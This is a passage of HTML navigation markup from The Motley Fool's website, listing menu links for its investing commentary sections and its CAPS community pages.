<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://www.fool.com/investing/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Investing Commentary</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://www.fool.com/investing/basics/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001">Basics</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/etf/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">ETFs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/options/options-a-foolish-introduction.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Options</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/small-cap/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Small-Cap</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/dividends-income/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Dividends & Income</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/high-growth/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">High Growth</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/value/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Value</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/mutualfunds/mutualfunds.htm" class="qsAdd qs-source-ifltnvsnv0000001">Mutual Funds</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://www.fool.com/investing/international/index.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">International</a></li>
</ul>
</li>
<li class="capsTab qsAdd qs-source-ifltnvpnv0000001"><a href="http://caps.fool.com/index.aspx" class="capsTab qsAdd qs-source-ifltnvpnv0000001"><span>CAPS Community</span></a>
<ul>
<li class="capsHome qsAdd qs-source-icasitlnk0000006"><a href="http://caps.fool.com/" class="capsHome qsAdd qs-source-icasitlnk0000006">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/myplayer.aspx" class="qsAdd qs-source-ifltnvsnv0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/tickerrankings.aspx?filter=7&sortcol=38&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Stocks</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/screener.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Screener</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/playerrankings.aspx?filter=20&sortcol=5&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Players</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/blogs/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Blogs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/stats.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Top Tens</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/tagrankings.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Tags</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/contests.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contests</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/feedback.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contact Us</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/help.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Help</a></li>
&..